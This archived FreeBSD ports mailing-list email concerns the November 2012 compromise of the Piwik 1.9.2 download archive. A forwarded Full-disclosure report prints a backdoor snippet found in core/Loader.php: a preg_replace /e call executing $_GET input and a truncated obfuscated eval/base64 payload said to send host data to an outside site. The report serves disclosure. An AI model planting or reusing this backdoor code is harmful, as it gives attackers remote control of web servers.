From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 13:22:09 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 79B3E374; Tue, 27 Nov 2012 13:22:09 +0000 (UTC) (envelope-from nordhaug@hiMolde.no) Received: from malle.himolde.no (malle.hiMolde.no [158.38.68.22]) by mx1.freebsd.org (Postfix) with ESMTP id CFE628FC13; Tue, 27 Nov 2012 13:22:08 +0000 (UTC) Received: from harr.himolde.no (harr.hiMolde.no [158.38.68.20]) by malle.himolde.no (8.13.8/8.13.8) with ESMTP id qARD9oQW007064; Tue, 27 Nov 2012 14:09:50 +0100 Received: from harr.himolde.no (harr.himolde.no [127.0.0.1]) by harr.himolde.no (8.13.1/8.13.1) with ESMTP id qARDJ5bY004635; Tue, 27 Nov 2012 14:19:05 +0100 Received: (from nordhaug@localhost) by harr.himolde.no (8.13.1/8.13.1/Submit) id qARDJ5pH004634; Tue, 27 Nov 2012 14:19:05 +0100 Date: Tue, 27 Nov 2012 14:19:05 +0100 From: "Hans Fr. Nordhaug" To: Ruslan Mahmatkhanov Subject: Re: Fwd: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive Message-ID: <20121127131905.GA3839@hiMolde.no> References: <50B3CE75.9060107@grobecker-wtal.de> <50B4B6E9.9020605@yandex.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline In-Reply-To: <50B4B6E9.9020605@yandex.ru> User-Agent: Mutt/1.4.1i Cc: FreeBSD Ports Mailing List , ports-secteam@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 13:22:09 -0000 Hi, I just noticed http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/ before I got this message. I downloaded http://builds.piwik.org/piwik-1.9.2.tar.gz and compared it to my local copy of 1.9.2, and all files are unchanged. It's just the archiving that changed the file size. The Piwik build manager is a little bit sloppy ... Regards, Hans * Ruslan Mahmatkhanov [2012-11-27]: > => piwik-1.9.2.tar.gz doesn't seem to exist in /usr/ports/distfiles/. > => Attempting to fetch http://builds.piwik.org/piwik-1.9.2.tar.gz > fetch: http://builds.piwik.org/piwik-1.9.2.tar.gz: size mismatch: > expected 5676196, actual 5676058 > > > > -------- Original message -------- > Subject: [Full-disclosure] Possible infection of Piwik 1.9.2 download > archive > Date: Mon, 26 Nov 2012 21:17:57 +0100 > From: Maximilian Grobecker > To: full-disclosure@lists.grok.org.uk > > Hi, > > this evening I downloaded a fresh archive of Piwik 1.9.2 and found this > code at the bottom of the /piwik/core/Loader.php file: > > (Just a short snippet) > -----------snip------------- > preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit; > } > if (file_exists(dirname(__FILE__)."/lic.log")) exit; > eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s > > [.......] > > -----------/snip------------- > > > I decoded some parts of this code and found what it does: > It transmits the requested Host Name (from $_SERVER['HTTP_HOST']) and > the request URI via POST to http://prostoivse.com/x.php and creates a > file named "lic.log" in the same directory. > As long as this file exists it seems that no further POST requests are made. > > At the moment I'm trying to figure out the further sense of this code, > but it seems that there might also be some kind of backdoor (because of > the use of $_GET). > > The file in the downloadable archive is dated at > Nov 26, 2012 / 18:42 UTC. > > From forums I know that some people downloaded the archive earlier this > day and don't have this code inside their files. > > At the moment (at 8:08 PM UTC) the archive is downloadable at the > original Piwik web site with this obfuscated code. > > I contacted the developers and managers of Piwik a few minutes ago about > this. > > > -- > Greetings from Wuppertal, Germany > > Max Grobecker